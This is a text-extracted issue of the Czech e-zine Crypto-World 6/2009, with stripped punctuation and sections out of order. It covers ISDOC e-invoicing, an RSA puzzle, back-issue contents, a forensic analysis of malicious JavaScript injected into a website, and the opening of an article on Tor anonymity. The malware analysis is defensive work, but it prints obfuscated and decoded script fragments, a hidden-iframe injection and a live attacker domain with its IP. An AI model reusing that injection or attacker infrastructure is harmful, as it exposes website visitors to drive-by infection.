Podpora formaacutetu externiacutemi naacutestroji Pro uacutečely podpory průmysloveacuteho nasazeniacute formaacutetu ISDOC již existujiacute i externiacute naacutestroje Jeden z nich vyvinula firma ABRA Software a pojmenovala jej ISDOCReader Jde o freeware tj program kteryacute je možneacute kdykoliv staacutehnout z přiacuteslušneacute adresy (wwwisdocorg) a začiacutet jej volně použiacutevat Tento naacutestroj provede po instalaci asociaci s oběma variantami formaacutetu ISDOC (isdoc i isdocx) a stane se tak vyacutechoziacutem prohliacutežečem tohoto formaacutetu ISDOCReader dovoluje libovolnyacute fakturačniacute doklad zobrazit do vizuaacutelniacute podoby faktury ověřit přiacuteslušnyacutem tlačiacutetkem elektronickyacute podpis dokladu přiacutepadně si doklad i vytisknout Je takeacute možneacute prohliacutežet a exportovat přiacutepadneacute přiacutelohy faktury Dalšiacutem krokem bdquoworkflowldquo zpracovaacuteniacute došleacute elektronickeacute faktury v menšiacute firmě je pak jejiacute postoupeniacute k automatickeacutemu či poloautomatickeacutemu zpracovaacuteniacute do ISERP přiacutejemce k čemuž je opět přiacuteslušneacute tlačiacutetko Technicky bude možnost odeslaacuteniacute dokladu do libovolneacuteho ISERP vyřešena pomociacute konfiguračniacuteho souboru kteryacute si každyacute vyacuterobce bude moci daacutet do sveacute instalace a kteryacute ISDOCReader bude volat

Crypto-World 62009

18

Přiacuteklad použitiacute freewaroveacuteho naacutestroje ISDOCReader na ověřeniacute elpodpisu

Pokud se některyacute z laskavyacutech čtenaacuteřů bude zajiacutemat o projekt ISDOC podrobněji dalšiacute informace včetně posledniacute verze formaacutetu dokumentace jeho datovyacutech struktur přiacutekladů datovyacutech souborů i aktuaacutelniacutech uacutedajů o podpoře formaacutetu jednotlivyacutemi vyacuterobci software nalezne na adrese wwwisdoccz Literatura

[1] Kolektiv autorů Dokumentace ke standardu UBL 20 [online] Dostupnyacute z WWW lthttpdocsoasis-openorgublcs-UBL-20UBL-20htmlgt

[2] Kosek Jiřiacute XML scheacutemata [online] Dostupnyacute z WWW lthttpwwwkosekczxmlschemawxshtmlgt

[3] Kolektiv autorů XSD Schema tutorial [online] Dostupnyacute z WWW lthttpwwww3schoolscomschemadefaultaspgt

[4] Kolektiv autorů sdruženiacute W3c Dokumentace ke Xmldsig [online] Dostupnyacute z WWW lthttpwwww3orgTRxmldsig-coregt

[5] Kolektiv autorů Pracovniacute skupiny pro elektronickou fakturaci SPIS Dokumentace k formaacutetu ISDOC [online] Dostupnyacute z WWW lthttpwwwisdocczgt

Crypto-World 62009

19

D Malaacute soutěž v luštěniacute RSA Pavel Vondruška (pavelvondruskacrypto-worldinfo)

Pro přiacuteznivce našich podzimniacutech soutěžiacute v luštěniacute ale samozřejmě i dalšiacute čtenaacuteře jsem připravil naacutesledujiacuteciacute drobnou uacutelohu Soutěžniacutem uacutekolem je rozluštěniacute šifroveacuteho textu 14 39 07 57 18 34 10 47 17 92 06 31 28 65 32 92 11 41 26 31 26 29 20 80 25 06 00 77 03 60 09 00 03 60 11 44 31 00 05 41 07 92 06 16 04 70 10 75 03 60 18 79 00 46 26 73 23 49 25 18 13 90 K zašifrovaacuteniacute otevřeneacuteho textu byl použit algoritmus RSA a formaacutetovaacuteniacute CW10 (detaily viz naacutepověda) veřejnyacute kliacuteč je (Ne)=(3337 79)

Při luštěniacute se řešitel seznaacutemiacute s algoritmem RSA a uvědomiacute si jak uacutezce souvisiacute bezpečnost algoritmu s modulem N Pro prveacute dva řešitele je připravena odměna V přiacutepadě zaacutejmu se mohou bezplatně zuacutečastnit kurzu Problematika infrastruktury veřejnyacutech kliacutečů (PKI)ldquo kterou 2562009 pořaacutedaacute akademie CZNIC (httpwwwnicczakademiecourse15detail) Lektorem kurzu je PVondruška Svaacute řešeniacute zasiacutelejte na adresu pavelvondruskacrypto-worldinfo Řešeniacute uacutelohy a jmeacutena všech uacutespěšnyacutech luštitelů budou zveřejněna v letniacutem dvojčiacutesle e-zinu Crypto-World 7-82009 kteryacute vyjde 182009 Z tohoto důvodu společně s řešeniacutem zašlete souhlas se zveřejněniacutem sveacuteho jmeacutena resp nickpseudonym kteryacute může byacutet miacutesto něj zveřejněn Přeji pěknou zaacutebavu

Doplňujiacuteciacute informace k soutěžniacute uacuteloze

1 Použityacute šifrovaciacute algoritmus

V podstatě se jednaacute o klasickyacute šifrovaciacute algoritmus založenyacute na RSA kde však otevřenyacute text neniacute formaacutetovaacuten podle PKCS 1 (verze 152021) ale podle naacutemi zadanyacutech pravidel kteraacute označiacuteme jako CW 10 2 Asymetrickyacute algoritmus RSA

Zvoliacuteme prvočiacutesla p a q a vypočteme N = pq

Φ(N) = (p-1)(q-1)

Daacutele zvoliacuteme naacutehodneacute čiacuteslo e kde

Crypto-World 62009

20

1 lt e lt Φ(N) takoveacute že e a Φ(N) jsou nesoudělnaacute

Vypočteme čiacuteslo d takoveacute že

1 lt d lt Φ(N) a

ed equiv 1 mod Φ(N)

Dvojici (Nd) nazveme soukromyacute kliacuteč a (Ne) veřejnyacute kliacuteč

3 Formaacutetovaacuteniacute zpraacutevy (CW10)

Zpraacutevu M překoacutedujeme nejprve do čiacuteselneacuteho tvaru K tomu použijeme některou vhodnou převodovou tabulku Např tuto tabulku

0 1 2 3 4 5 6 7 8 9 6 0 Mezera 2 3 4 A B C D E 7 F G H I J K L M N O 8 P Q R S T U V W X Y 9 Z 1 2 3 4 5 6 7 8 9 Zpraacutevu M pak zformaacutetujeme do posloupnosti čiacutesel pevneacute deacutelky (deacutelka bude rovna deacutelce modulu N) K tomu použijeme vlastniacute formaacutetovaacuteniacute kteraacute pracovně nazveme CW10 Formaacutetovaacuteniacute CW10 1) Maacute-li modul deacutelku k budeme zpraacutevu převedenou podle tabulky dělit na skupiny deacutelky k-1 2) Všechny skupiny musiacute miacutet deacutelku k-1 nemaacute-li proto posledniacute skupina tuto deacutelku doplniacuteme

ji zprava přiacuteslušnyacutem počtem nul 3) Všechny ziacuteskaneacute skupiny nyniacute doplniacuteme zleva jednou nulou Deacutelka každeacute skupiny je po

těchto uacutepravaacutech rovna k 4) Vyacutesledek po šifrovaacuteniacute maacute deacutelku rovnou maximaacutelně k nemaacute-li ji doplniacuteme vyacutesledek zleva

nulami Ziacuteskanyacute vyacutesledek po formaacutetovaacuteniacute M označme M= m1 m2 m3 hellip 4 Zašifrovaacuteniacute zpraacutevy M

Zašifrovaacuteniacutem zpraacutevy M pomociacute veřejneacuteho kliacuteče (Ne) rozumiacuteme řetězec

P = C1 C2 C3 kde

C1 equiv m1e mod N C2 equiv m2

e mod N C3 equiv m3e mod N Ci equiv mi

e mod N

5 Dešifrovaacuteniacute zpraacutevy P

Dešifrovaacuteniacute zpraacutevy P se pak provede tak že použijeme soukromyacute exponent d a tiacutem ziacuteskaacuteme původniacute zpraacutevu M

m1 equiv C1d mod N m2 equiv C2

d mod N m3 equiv C3d mod N mi equiv Cid mod N

6 Bezpečnost Pokud dokaacuteže přiacutejemce udržet svůj soukromyacute kliacuteč v tajnosti (a čiacutesla p a q byla dostatečně velkaacute) pak je ze znalosti šifroveacute zpraacutevy a veřejneacuteho kliacuteče vyacutepočetně složiteacute ziacuteskat otevřenou zpraacutevu

Crypto-World 62009

21

E O čem jsme psali v červnu 2000 ndash 2008 Crypto-World 62000 A Novaacute evropskaacute iniciativa v oblasti kryptografie (JPinkava) 2 B Fermatův test primality Carmichaelova čiacutesla bezčtvercovaacute čiacutesla (PVondruška)3 -5 C Červ LOVE-LETTER-FOR-YOUTXTVBS (PVondruška) 6-8 D EUROCRYPT 2000 (PVondruška) 9-11 E Code Talkers (IIIdiacutel) (PVondruška) 12-14 F Letem šifrovyacutem světem 15 G Zaacutevěrečneacute informace 16 Přiacuteloha Navajo Code Talkers revize z 1561945 soubor Dictionaryhtm

Crypto-World 62001 A Zaacutehadnaacute paacuteska z Prahy IIdiacutel (PVondruška JJanečko) 2- 6 B Radioaktivniacute rozpad a kryptografickeacute kliacuteče (LSmoliacutek) 7-9 C Kryptografie a normy diacutel 8 - Normy IETF - SMIME (J Pinkava) 10-13 D Počiacutetačovyacute kurs Lidovyacutech novin (PVondruška) 14-15 E Security and Protection of Information (D Cvrček) 16 F Praacutevniacute odpovědnost poskytovatelů (JMatejka) 17-23 G Ukončeniacute platnosti zneplatněniacute (a zrušeniacute) certifikaacutetu IIdiacutel (JProkeš) 24-25 H Letem šifrovyacutem světem 26-27 I Zaacutevěrečneacute informace 28 Přiacuteloha priloha6zip (fotografie Security 2001 teacutemata přednaacutešek na konferenci Eurocryptacute2001)

Crypto-World 62002 A Historie a statistika Crypto-Worldu (PVondruška) 2-4 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 4 (JPinkava) 5-8 C Bezpečnost informačniacuteho systeacutemu pro certifikačniacute služby (ISCS)

a objektovaacute bezpečnost (PVondruška) 9-16 D Informace - Cryptology ePrint Archive (VKliacutema) 17 E Letem šifrovyacutem světem 18-19

1 Kritika člaacutenku Je 1024-bitovaacute deacutelka kliacuteče RSA dostatečnaacute (Crypto-World 52002)

2 Zaacutekon o elektronickeacutem podpisu novelizovaacuten - Zaacutekon č 2262002 Sb 3 Hackeři pomozte 4 O čem jsme psali v červnu 2000 a 2001

F Zaacutevěrečneacute informace 20

Crypto-World 62003 A Nebezpečiacute internetovyacutech řešeniacute (MKuchař) 2-6 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 13

Atributoveacute certifikaacutety ndash diacutel 2 (JPinkava) 7-10 C Kryptografickeacute protokoly s nulovyacutem předaacuteniacutem znalostiacute(JPinkava) 11-12 D Elektronickeacute peniacuteze (PVondruška) 13-20 E Letem šifrovyacutem světem 21-23 F Zaacutevěrečneacute informace 24

Crypto-World 62009

22

Crypto-World 62004 A Měsiacutec prvočiacutesel (PVondruška) 2-5 B Statistickyacute rozbor největšiacuteho prvočiacutesla (PTesař) 6-7 C Program STORK - vstupniacute dokumenty přiacuteprava (E-CRYPT) čaacutest 2 (JPinkava) 8-16 D Letem šifrovyacutem světem 17-18 E Zaacutevěrečneacute informace 19

Crypto-World 62005 A Informace pro čtenaacuteře a autory (PVondruška) 2-3 B Kontrola certifikačniacute cesty čaacutest 1 (P Rybaacuter) 4-11 C O neziacuteskateľnosti rodneacuteho čiacutesla z jeho hashu (M Pivoluska) 12-13 D Přehledovaacute zpraacuteva o vyacuteznamnyacutech publikaciacutech a projektech na teacutema

poskytovaacuteniacute anonymity klasifikace a měřitelnost informačniacuteho soukromiacute (privacy) čaacutest 2 (M Kumpošt) 14-17

E Kryptografickeacute eskalačniacute protokoly čaacutest 1 (J Krhovjaacutek) 18-21 F Recenze knihy Jon Erickson Hacking - uměniacute exploitace 22 G O čem jsme psali v červnu 2000-2004 23 H Zaacutevěrečneacute informace 24

Crypto-World 62006 A PKI roaming (L Dostaacutelek) 2-4 B Vyhlaacuteška o podrobnostech atestačniacuteho řiacutezeniacute pro elektronickeacute naacutestroje

a lehkyacute uacutevod do časoveacute synchronizace (P Vondruška) 5-9 C Univerzaacutelniacute posilovače hašovaciacutech funkciacute včetně MD5 a SHA1

aneb zaacutechranneacute kolo pro zoufalce (V Kliacutema) 10-14 D NIST (National Institute of Standards and Technology - USA) a kryptografie Recommendation on Key Management ndash čaacutest 2

(J Pinkava) 15-18 E O čem jsme psali v červnu 1999-2005 19-20 F Zaacutevěrečneacute informace 21

Crypto-World 62007 A Přehled a historie polyalfabetickyacutech šifer (PVondruška) 2-11 B Matematizace komplexniacute bezpečnosti v ČR čaacutest I (JHrubyacute) 12-20 C Mikulaacutešskaacute kryptobesiacutedka Call for Papers 21 D O čem jsme psali v červnu 2000-2006 22-23 E Zaacutevěrečneacute informace 24 Přiacuteloha Mikulaacutešskaacute kryptobesiacutedka (6-7122007)- MKB2007_CallForPapers_cervenpdf

Crypto-World 62008 A RFID Co to vlastně maacuteme v kapse (MHlavaacuteč TRosa) 2 - 17 B Bezpečnost PHP aplikaciacute (JVraacutena) 18 - 22 C Popis šifrovaciacuteho algoritmu Serpent (JJeřaacutebek) 24 - 29 D O čem jsme psali v červnu 2000-2007 30 ndash 31 E Zaacutevěrečneacute informace 32

Crypto-World 62009

23

F Zaacutevěrečneacute informace 1 Sešit Crypto-World je oficiaacutelniacute informačniacute sešit Kryptologickeacute sekce Jednoty českyacutech matematiků a fyziků (GCUCMP) Obsahuje člaacutenky podepsaneacute autory Přiacutepadneacute chyby a nepřesnosti jsou diacutelem PVondrušky a autorů jednotlivyacutech podepsanyacutech člaacutenků GCUCMP za ně nemaacute odbornou ani jinou zodpovědnost Adresa URL na niacutež můžete najiacutet tento sešit (zpravidla 3 tyacutedny po jeho rozeslaacuteniacute) a předchoziacute sešity GCUCMP denně aktualizovaneacute novinky z kryptologie a informačniacute bezpečnosti normy standardy straacutenky některyacutech členů a dalšiacute souvisejiacuteciacute materiaacutely httpcrypto-worldinfo 2 Registrace zrušeniacute registrace Zaacutejemci o e-zin se mohou zaregistrovat pomociacute e-mailu na adrese pavelvondruskacrypto-worldinfo (předmět Crypto-World) nebo použiacutet k odeslaacuteniacute žaacutedosti o registraci elektronickyacute formulaacuteř na httpcrypto-worldinfo Při registraci vyžadujeme pouze jmeacuteno a přiacutejmeniacute titul pracoviště (neniacute podmiacutenkou) a e-mail adresu určenou k zasiacutelaacuteniacute koacutedů ke staženiacute sešitu Ke zrušeniacute registrace stačiacute zaslat kraacutetkou zpraacutevu na e-mail pavelvondruskacrypto-worldinfo (předmět rušiacutem odběr Crypto-Worldu) nebo opět použiacutet formulaacuteř na httpcrypto-worldinfo Ve zpraacutevě prosiacutem uveďte jmeacuteno a přiacutejmeniacute a e-mail adresu na kterou byly koacutedy zasiacutelaacuteny 3 Redakce

E-zin Crypto-World Redakčniacute praacutece Pavel Vondruška Staacuteliacute přispěvateleacute Pavel Vondruška Jaroslav Pinkava Jazykovaacute uacuteprava Jakub Vraacutena Přehled autorů httpcrypto-worldinfoobsahautoripdf NEWS Vlastimil Kliacutema (vyacuteběr přiacutespěvků Jaroslav Pinkava komentaacuteře a Tomaacuteš Rosa vklaacutedaacuteniacute na web) Pavel Vondruška Webmaster Pavel Vondruška jr 4 Spojeniacute (abecedně) redakce e-zinu ezincrypto-worldinfo httpcrypto-worldinfo Vlastimil Kliacutema vklimavolnycz httpcryptographyhyperlinkcz Jaroslav Pinkava JaroslavPinkavazonercz httpcrypto-worldinfopinkava Tomaacuteš Rosa t_rosavolnycz httpcryptohyperlinkcz Pavel Vondruška pavelvondruskacrypto-worldinfo httpcrypto-worldinfovondruskaindexphp Pavel Vondruškajr pavelcrypto-worldinfo httpwebdesigncrypto-worldinfo Jakub Vraacutena jakubvranacz httpwwwvranacz

Page 3: Sešit 6/2009 (452 kB)

Crypto-World 62009

3

Ze zkušenosti doporučuji nerozebiacuterat škodlivyacute koacuted na platformě pro kterou je určen Zaacutesadně provaacutediacutem analyacutezu malware pro Windows na Linuxu a obraacuteceně K analyacuteze zamlženeacuteho koacutedu (anglicky obfuscated code) použiacutevaacutem v maximaacutelniacute miacuteře automatickeacute naacutestroje nebo skripty Z velmi prosteacuteho důvodu - šetřiacute to čas Analyacuteza zdrojoveacuteho koacutedu javascriptu Uklaacutedaacutem zamlženyacute (angl obfuscated) řetězec do souboru payload a zjišťuji co je ukryteacute uvnitř Jeden linuxovyacute přiacutekaz - cat payload | perl -pe sx()chr(hex($1))ge - rozkoacutedoval payload do čitelnějšiacute podoby ltscript type=textjavascriptgt function cVUi1G(bAhY) function bDg4(koz) var gXARrbV=0 var abt=kozlength zKpOXd=0 (kompletniacute koacuted je uveden v [13] přiacuteloze 2 bdquoVloženyacute Javascript ndash zdrojovyacute koacutedldquo) Rozloženyacute koacuted již vypadaacute daleko čitelněji než původniacute forma a lze odhadovat co dělaacute Celyacute skript se tak sklaacutedaacute ze dvou čaacutestiacute Prvniacute je již čitelnyacute koacuted kteryacute provede prvniacute rozkrytiacute koacutedu (anglicky de-obfuscation) a druhou čaacutestiacute je nejzajiacutemavějšiacute čaacutest javascriptu - vlastniacute (v tuto chviacuteli jsem předpoklaacutedal) maligniacute koacuted Před rokem a půl uacutetočniacutekům většinou stačil pouhyacute unescape k vyhnutiacute se detekci antivirovyacutech programů nicmeacuteně od teacute doby se vyvinuly jako metody detekce tak metody skryacutevaacuteniacute Rozkoacutedovat řetězec nebylo žaacutednyacute probleacutem ale bohužel neobsahoval žaacutedneacute čitelneacute čaacutesti Důvod je jednoduchyacute Vnitřniacute koacuted je zašifrovanyacute jednoduchou šifrou Pokusiacutem se popsat co danyacute koacuted znamenaacute function dsWV7(fE7uydQbss) return fE7uycharCodeAt(dQbss) vraacutetiacute z řetězce fE7uy znak na pozici dQbss function bDg4(koz) var gXARrbV=0 var abt=kozlength zKpOXd=0 while (zKpOXdltabt) gXARrbV+=dsWV7(kozzKpOXd)abt zKpOXd++ return (gXARrbV+) zpracuje řetězec koz a vynaacutesobiacute součet ASCII hodnot v řetězci deacutelkou řetězce Vlastniacute dešifrovaciacute koacuted vypadaacute takto var dkm7Gx=eval(a_r0gu_m+e0nt1s++c1a+l_le_e+replace([0_1+]g )) v dkm7Gx je odkaz na vlastniacute funkci k umožněniacute rekurze k4Rca= xF7S=0 r6bZl=0 var tIu6Ye=(new String(dkm7Gx))replace([^a-z0-9A-Z_-]g)

Crypto-World 62009

4

Niacuteže koacuted jsem nebyl schopen rozluštit bez spuštěniacute v chraacuteněneacutem prostřediacute (Sandbox) var xwjC=bDg4(tIu6Ye) bAhY=unescape(bAhY) lt- v bAhY je nyniacute uložen obfuskovanyacute koacuted v binaacuterniacute podobě for(var lJQZh=0 lJQZh lt (bAhYlength) lJQZh++) var bFKWW=dsWV7(tIu6YexF7S)^dsWV7(xwjCr6bZl) var uF0=dsWV7(bAhYlJQZh) xF7S++r6bZl++ k4Rca+=StringfromCharCode(uF0^bFKWW) if(r6bZlgtxwjClength)r6bZl=0 if(xF7SgttIu6Yelength)xF7S=0 Jako kliacuteč k dešifrovaacuteniacute se použiacutevaacute kliacuteč bFKWW kteryacute je ziacuteskaacuten jako XOR znaků ziacuteskanyacutech z prostřediacute v průběhu vykonaacutevaacuteniacute javascriptu Otevřenyacute text je poteacute ziacuteskaacuten jako šifrovanyacute text XOR kliacuteč Metoda šifrovaacuteniacute nebyla hlavniacutem ciacutelem paacutetraacuteniacute je to pouze zajiacutemavost nebo překaacutežka kterou je třeba překonat Daacutel už se bez znalosti prostřediacute ve ktereacutem je javascript spuštěn nedalo pokračovat Na řadu přišel experiment v chraacuteněneacute laboratoři Vlastniacute skrytyacute koacuted Javscript jsem krokoval v Microsoft Script Editoru a po chviacuteli jsem ziacuteskal teď již kompletniacute koacuted function ascgpELkf() ascgpELkfprototype = getFrameURL function() var dlh=documentlocationhost return http+ + ((dlh == || dlh == undefined) thisgetRandString() ) + dlhreplace ([^a-z0-9-])replace (+) + + thisgetRandString() + + thispath + thishost hostqqcn pathf+q+StringfromCharCode(119)+e+r+new String(z)+StringfromCharCode(46)+new String(c)+new String(n) (uveden v [13] přiacuteloze 3 - bdquoVloženyacute Javascript ndash škodlivyacute koacutedldquo) Celeacute toto sloužiacute k instalaci koacutedu ze straacutenek uacutetočniacuteka anebo k vloženiacute naacutesledujiacuteciacuteho koacutedu do dokumentu kteryacute se vykonaacute při zobrazeniacute straacutenky Vloženyacute koacuted do straacutenky je naacutesledujiacuteciacute ltdiv style=displaynonegtltiframe src=httpAAXXXYczb7d4677a720fcd24fqwerzcnqqcngt ltiframegtltdivgt AAAXXXCZ je URL ze ktereacute byla tato straacutenka volaacutena b7d4677a720fcd24 je naacutehodneacute čiacuteslo Pokud se skript vykonaacute pak uacutetočniacutekovi na domeacuteně fqwerzcn (IP 21211718534) je odeslaacuten naacutesledujiacuteciacute HTTP požadavek GET qqcn HTTP11 Accept imagegif imagex-xbitmap imagejpeg imagepjpeg applicationx-shockwave-flash Referer httpAAXXXYcztesthtml Accept-Language en-us Accept-Encoding gzip deflate User-Agent Mozilla40 (compatible MSIE 60 Windows NT 51 SV1) Host AAXXXYczb7d4677a720fcd24fqwerzcn Connection Keep-Alive

Crypto-World 62009

5

Vyacutepis z whois pro IP adresu 21211718534 inetnum 2121171850 - 212117185255 netname RUSTELEKOM descr Rustelekom LLC country RU Analyacuteza malware Pokud fqwerzcnqqcn otevřete pak se Vaacutem do počiacutetače staacutehne vcelku slušneacute množstviacute havěti Zajiacutemaveacute na straacutence uacutetočniacuteka je že je zde implementovaacuten mechanizmus sledovaacuteniacute kdo jakeacute přiacutekazy posiacutelaacute a zdaacute se že maacute oběť dva pokusy na ziacuteskaacuteniacute infekce Poteacute dojde na nějakyacute čas k zablokovaacuteniacute pravděpodobně IP adresy Je možneacute že se takto uacutetočniacutek braacuteniacute analyacuteze provozu nebo se pouze snažiacute šetřit siacuteťovyacute provoz Bohužel toto velmi znesnadňuje analyacutezu a opakovaacuteniacute pokusu Po otevřeniacute ve virtuaacutelniacute laboratoři stouplo vytiacuteženiacute procesoru laboratoře na 100 a do dvou minut laboratoř havarovala se zobrazeniacutem modreacuteho šetřiče obrazovky Poteacute jsem již stanici nespouštěl do Windows ale provedl jsem boot do dřiacuteve volně dostupneacuteho naacutestroje pro forenzniacute analyacutezu ndash Helix CD Vytvořil jsem MD5 hash (odborniacuteci prominou) všech souborů na disku a dal se do zjišťovaacuteniacute změn porovnaacuteniacutem originaacutelniacutech souborů se změněnyacutemi Každyacute zjištěnyacute přidanyacute nebo změněnyacute soubor jsem nahraacutel na virustotalcom abych zjistil jak se k němu postaviacute jednotliveacute antiviroveacute systeacutemy Vyacutesledky jsou vcelku zajiacutemaveacute doporučuji je shleacutednout v [13] přiacuteloze 4 ndash bdquoVyacutesledky antivirovyacutech kontrolldquo

Zdroj infekce

V okamžiku kdy bylo zjištěno co danyacute javascript znamenaacute pustili jsme se s Kubou do zjištěniacute kde se vlastně na straacutenkaacutech objevil a odkud Podařilo se naacutem kontaktovat administraacutetora a ziacuteskat logy z web serveru V logu přiacutestupů jsme objevili mnoho zaacuteznamů o přihlaacutešeniacute na FTP z adres z Čiacuteny Zajiacutemavyacutem zjištěniacutem bylo že jsme našli pouze uacutespěšnaacute přihlaacutešeniacute čili uacutetočniacutek odněkud ziacuteskal platneacute uživatelskeacute jmeacuteno a heslo Paacutetrali jsme zdali existuje vir kteryacute krade hesla do FTP a našli jsme jich několik Předpoklaacutedaacuteme že počiacutetač administraacutetora straacutenek byl dřiacuteve infikovaacuten virem jehož ciacutelem bylo ziacuteskat přiacutestupy na FTP uacutečty ndash napřiacuteklad viry Virut nebo Neosploit Bohužel paacutetrat zpětně v čase jakyacute vir byl na stanici několik měsiacuteců zpět nepřineslo žaacutednyacute vyacutesledek

Poteacute jsme takeacute zjišťovali co se změnilo na FTP uacutečtu a našli jsme že pro danou domeacutenu byl do každeacuteho existujiacuteciacuteho php a js souboru vložen škodlivyacute javascript

Zaacutevěr

Po prohleacutednutiacute exploitů bych doporučil na klientskyacutech počiacutetačiacutech miacutet staacutele aktualizovaneacute Windows použiacutevat firewall zajistit nainstalovanyacute a aktuaacutelniacute antivirovyacute systeacutem s aktuaacutelniacute antivirovou databaacuteziacute při pohybu po internetu použiacutevat prohliacutežeč Firefox s nainstalovanyacutem NoScript pluginem Takteacutež bych nedoporučoval použiacutevaacuteniacute automaticky funkci pamatovaacuteniacute hesel miacutesto toho by bylo vhodneacute použiacutet password managery jako je napřiacuteklad Keepass

Crypto-World 62009

6

Z pohledu administraacutetora serveru by bylo vhodneacute aby klienti přestali použiacutevat FTP protokol pro update straacutenek a tento nahraacuteli SCP nebo FTPS Přiacutestup na server by měl byacutet omezen pouze pro nezbytně nutnyacute rozsah IP adres Rozsahy IP adres pouze pro Českou Republiku a Slovensko Kuba zveřejnil na sveacutem blogu [12] Administraacutetoři by si takteacutež měli zajistit vynuceniacute změny FTP hesla po přibližně 90-ti dnech

Odkazy

[1] Obfuscation - httpenwikipediaorgwikiObfuscated_code [2] Sandbox analyacuteza javascriptu umiacutestěneacuteho ve straacutence httpwepawetiseclaborgviewphphash=63e61b9084ca87248668eb83c9aa5742amptype=js [3] Referenčniacute přiacuteručka Javascript ndash httpsdevelopermozillaorgenCore_JavaScript_15_Reference [4] Analyacuteza javascriptů na Internet Storm Center ndash httpiscsansorgdiaryhtmlstoryid=4246 httpiscsansorgtaghtmltag=javascript [5] Microsoft Script Editor guide - httperikeaenetarchives20050704214950 [6] Českeacute a Slovenskeacute rozsahy IP adres httpwwwdrupalczblogjakub-suchyip-adresy-statu-cz-sk-rozsahy [7] Dancho Danchevs blog - httpddanchevblogspotcom [8] Informace o Neosploit httpsecurityworldczsecurityworldutocnici-ziskali-pristup-k-200-000-serverum-a-nasadili-zde-neosploit-280 [9] Neosploit - přiacutepad z Českeacute Republiky httpwwwbenczczaktualitynas-web-byl-napaden-hackerem [10] Test souborů na vyacuteskyt virů ndash httpvirustotalcom [11] Helix3 tm ndash dřiacuteve dostupnyacute na httpwwwe-fensecom [12] Suchyacute J httpwwwdrupalczblogjakub-suchyip-adresy-statu-cz-sk-rozsahy [13] Vorliacuteček J Suchyacute J Vyacuteprava za obsahem javascriptu

přiacuteloha k e-zinu Crypto-World 62009 Přiacuteloha 1 - bdquoVloženyacute Javascript ndash koacuted ve straacutenceldquo str1-6 Přiacuteloha 2 - bdquoVloženyacute Javascript ndash zdrojovyacute koacutedldquo str7-9 Přiacuteloha 3 - bdquoVloženyacute Javascript ndash škodlivyacute koacutedldquo str10-11 Přiacuteloha 4 - bdquoVyacutesledky antivirovyacutech kontrolldquo str12-24

Crypto-World 62009

7

B Anonymita v globaacutelniacute siacuteti Ing Jan Hajnyacute Uacutestav telekomunikaciacute FEKT VUT Brno (hajnyfeecvutbrcz) Abstrakt ndash Hlavniacutem ciacutelem tohoto člaacutenku je popsat současnyacute stav tyacutekajiacuteciacute se ochrany privaacutetniacutech dat při použiacutevaacuteniacute informačniacutech systeacutemů a identifikovat zaacutekladniacute prostředky pro jejich ochranu V prvniacute čaacutesti jsou zmiacuteněny hlavniacute probleacutemy při využiacutevaacuteniacute současnyacutech informačniacutech technologiiacute a hrozby ktereacute naacutem mohou přineacutest Druhaacute čaacutest člaacutenku se věnuje jednomu z prvniacutech kroků při ochraně anonymity v počiacutetačovyacutech siacutetiacutech Jednaacute se o technologii Tor poskytujiacuteciacute možnost skrytiacute identity Osobniacute data a jejich využiacutevaacuteniacute

V současneacute době již plně žijeme v informačniacute společnosti tedy společnosti založeneacute na datech a jejich přenosu zpracovaacuteniacute Teacuteměř každyacute z naacutes využiacutevaacute osobniacute počiacutetač mobilniacute telefon kreditniacute karty či smart karty pro identifikaci v různyacutech organizaciacutech a uacuteřadech Neniacute však zcela zřejmeacute jakaacute data se ve skutečnosti pomociacute těchto přiacutestrojů přenaacutešiacute a kolik mohou řiacuteci o našem chovaacuteniacute a soukromiacute Nejsou to takeacute pouze zařiacutezeniacute kteraacute vlastniacuteme a kteraacute tak můžeme přiacutemo ovlivnit Jednaacute se i o tzv bezpečnostniacute zařiacutezeniacute všude kde se pohybujeme ndash např dohledoveacute kamery ve městech skenery na letišti biometrickeacute pasy nebo různeacute slevoveacute karty obchodniacutech řetězců Všechny tyto zařiacutezeniacute mohou pracovat s našiacute identitou a my nejsme schopni přiacuteliš ovlivnit kolik informaciacute o naacutes uvolňujiacute Mnoho přiacutekladů může byacutet uvedeno např ze člaacutenků Bruce Schneiera kteryacute se problematikou ochrany identity zabyacutevaacute Ze člaacutenku zabyacutevajiacuteciacuteho se problematikou privaacutetniacutech dat [1] je jasneacute že se nejednaacute pouze o teoretickou hrozbu Přiacutekladem mohou byacutet dohledoveacute systeacutemy Jen v Londyacuteně je v současneacute době okolo 500000 dohledovyacutech kamer [2] I přesto z některyacutech vyacutezkumů vyplyacutevaacute [3] že jejich efektivita neniacute při odhalovaacuteniacute zločinů přiacuteliš vysokaacute Zatiacutemco mohou miacutet menšiacute vliv na přesunutiacute zločinnosti na jinaacute miacutesta v globaacutelnějšiacutem měřiacutetku se neprojeviacute Na druhou stranu jsou tyto systeacutemy v provozu 24 hodin denně a sniacutemajiacute všechny osoby na veřejnyacutech miacutestech S technologickyacutem vyacutevojem nejsme daleko od automatickeacuteho rozpoznaacutevaacuteniacute tvaacuteřiacute a tedy i identifikace osob na zaacuteznamech Budou o naacutes tedy znaacutema data tyacutekajiacuteciacute se našeho pohybu během dne chovaacuteniacute (např kde nakupujeme) a dokonce bude možneacute kamery zneužiacutet k ilegaacutelniacutemu sledovaacuteniacute osob v soukromyacutech bytech atd ktereacute jsou v dosahu kamer Stejně tak znaacuteme leteckeacute fotografie sloužiacuteciacute jako podklady k mapaacutem ndash dostatečně detailniacute na odhaleniacute mnoha informaciacute o soukromyacutech osobaacutech

Dalšiacutem přiacutekladem ohroženiacute identity jsou smart karty a jejich využiacutevaacuteniacute během běžneacute denniacute činnosti Neniacute složiteacute si uvědomit že někde musiacute existovat data o tom co během dne jiacuteme (zaměstnaneckeacute ID karty) nakupujeme v obchodech (kreditniacute karty) jakeacute maacuteme zvyky při naacutekupech např potravin (slevoveacutečlenskeacute karty) nebo o co se zajiacutemaacuteme (videopůjčovnyknihovny) Ve všech těchto přiacutepadech je jednoznačně spojena naše identita s našiacutem chovaacuteniacutem Vytvaacuteřiacute se tak jakyacutesi datovyacute otisk našiacute osobnosti i přesto že tyto data jsou rozprostřena u různyacutech organizaciacute a na různyacutech miacutestech

